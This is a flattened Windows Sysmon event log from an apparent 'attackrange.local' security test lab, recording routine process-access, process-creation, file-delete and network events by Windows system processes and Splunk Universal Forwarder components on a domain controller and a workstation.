07:43:51.520{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:51.520{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.520{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.520{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F2B7-60EB-E87C-00000000CF01}6504C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.520{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2B7-60EB-E87C-00000000CF01}6504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.521{466BC892-F2B7-60EB-E87C-00000000CF01}6504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.152{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E120EF29D27ACC41B6CE80B4969695FF,SHA256=B86A4C1220CE5A2FCB0B99AF96FDDE371851F0440788D4B0F8CA1BDDAEFDCBCC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.819{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2B8-60EB-EA7C-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.819{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F2B8-60EB-EA7C-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.819{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2B8-60EB-EA7C-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.805{466BC892-F2B8-60EB-EA7C-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
23542300x80000000000000001045880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.588{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F2161C7C582C8CD4621B4B269E6269B,SHA256=AD7B071CFE1FC934C2825CBD5F3819ECF668C487FB0FE668E2511FDAB1391529,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806027Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:52.075{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF596289A5A448B88E86B6810B7E08BC,SHA256=581CE307040E50D6C992FF95DB24C99B5DEED9556E97E75E8D728CD5636F015F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6CF63A398D3BA3DFA02C909F124B6F2E,SHA256=8A22A386F4EA73A453814B7D9F36A658AD18DF0D3A7ED8335FFBF940A1421E5D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.435{466BC892-F2B8-60EB-E97C-00000000CF01}51969456C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.219{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2B8-60EB-E97C-00000000CF01}5196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:52.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:52.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.219{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F2B8-60EB-E97C-00000000CF01}5196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.219{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2B8-60EB-E97C-00000000CF01}5196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.204{466BC892-F2B8-60EB-E97C-00000000CF01}5196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.966{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36D08FF44FB089FCACFCDB0BFE42628F,SHA256=4A179C8EDC7E693A10EE1DD0B7B019EBA7B1B8A3A8794692267A1BF270E9B75B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001045913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.919{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D2F5DC555E0D12D657AC4508CC16C2B,SHA256=0351EAC9EE10420132AEA6352E4909FB84CB30DF2EA15899AED3C98B9AAD8382,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.750{466BC892-F2B9-60EB-EB7C-00000000CF01}42285164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000806029Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:51.396{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57151-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806028Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:53.075{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
